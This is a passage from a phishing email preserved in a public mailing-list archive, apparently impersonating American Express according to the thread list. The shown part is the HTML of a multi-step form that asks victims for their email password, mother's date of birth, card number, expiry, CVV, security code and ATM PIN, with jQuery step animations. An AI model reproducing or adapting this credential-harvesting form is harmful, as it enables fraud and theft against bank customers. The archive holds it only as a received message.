<input id="lilo_userName" type="text" value="" placeholder="Mother's Date of Birth" name="mdob" placeholder='Enter your Mother's Date of Birth' maxlength="32" />
</div>
</div>
<div class="lilo_clear"> </div>
<br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Phone Number" name="phone" placeholder='Enter your Phone Number' maxlength="12" />
</div>
</div>
<div class="lilo_clear"> </div>
<br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Email Address" name="Email" placeholder='Enter your Email Address' maxlength="45" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="password" value="" placeholder="Email Password" name="EmailP" placeholder='Enter your Email Password' maxlength="32" />
</div>
</div>
<input type="button" name="previous" class="previous action-button" value="Previous" />
<input type="button" name="next" class="next action-button" value="Next" />
</fieldset>
<fieldset>
<h2 class="fs-title">Card Information</h2>
<h3 class="fs-subtitle"></h3>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Card Number" name="cardNumber" placeholder='Enter your Card Number' maxlength="15" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Name on Card" name="NameonCard" placeholder='Enter your Name on Card' maxlength="32" />
</div>
</div>
<br><br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Expiration Month - MM" name="DateMonth" placeholder='Enter your Expiration Date (Month)' maxlength="2" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Expiration Year - YYYY" name="DateYear" placeholder='Enter your Expiration Date (Year)' maxlength="4" />
</div>
</div>
<br><br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="password" value="" placeholder="4-Digit Card ID" name="cvv2" placeholder='Enter your 4-Digit Card ID' maxlength="4" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="password" value="" placeholder="Card Security Code" name="csc" placeholder='Enter your Card Security Code' maxlength="3" />
</div>
</div>
<div class="lilo_clear"> </div>
<br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="password" value="" placeholder="ATM Pin" name="ATMPin" placeholder='Enter your ATM Pin' maxlength="4" />
</div>
</div>
<input type="button" name="previous" class="previous action-button" value="Previous" />
<input type="button" onclick="check(this.form)" name="btnsubmit" class="submit action-button" value="Submit" />
</fieldset>
</form>
<br><br>
<!-- jQuery -->
<script src="http://thecodeplayer.com/uploads/js/jquery-1.9.1.min.js" type="text/javascript"></script>
<!-- jQuery easing plugin -->
<script src="http://thecodeplayer.com/uploads/js/jquery.easing.min.js" type="text/javascript"></script>
<script>
var current_fs, next_fs, previous_fs;
var left, opacity, scale;
var animating;
$('.next').click(function () {
if (animating)
return false;
animating = true;
current_fs = $(this).parent();
next_fs = $(this).parent().next();
$('#progressbar li').eq($('fieldset').index(next_fs)).addClass('active');
next_fs.show();
current_fs.animate({ opacity: 0 }, {
step: function (now, mx) {
scale = 1 - (1 - now) * 0.2;
left = now * 50 + '%';
opacity = 1 - now;
current_fs.css({ 'transform': 'scale(' + scale + ')' });
next_fs.css({
'left': left,
'opacity': opacity
});
},
duration: 800,
complete: function () {
current_fs.hide();
animating = false;
},
easing: 'easeInOutBack'
});
});
$('.previous').click(function () {
if (animating)
return false;
animating = true;
current_fs = $(this).parent();
previous_fs = $(this).parent().prev();
$('#progressbar li').eq($('fieldset').index(current_fs)).removeClass('active');
previous_fs.show();
current_fs.animate({ opacity: 0 }, {
step: function (now, mx) {
scale = 0.8 + (1 - now) * 0.2;
left = (1 - now) * 50 + '%';
opacity = 1 - now;
current_fs.css({ 'left': left });
previous_fs.css({
'transform': 'scale(' + scale + ')',
'opacity': opacity
});
},
duration: 800,
complete: function () {
current_fs.hide();
animating = false;
},
easing: 'easeInOutBack'
});
});
$('.submit').click(function () {
return false;
});
//@ sourceURL=pen.js
</script>
<script src='http://codepen.io/assets/editor/live/css_live_reload_init.js'></script>
</div>
</body></html>
^ permalink raw reply [flat|nested] 3+ messages in thread
end of thread, other threads:[~2015-07-23 11:44 UTC | newest]
Thread overview: 3+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2015-07-22 11:19 Unauthorized activity on your online account American Express
-- strict thread matches above, loose matches on Subject: below --
2015-07-23 11:33 American Express
2015-01-22 11:10 Bank of America
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).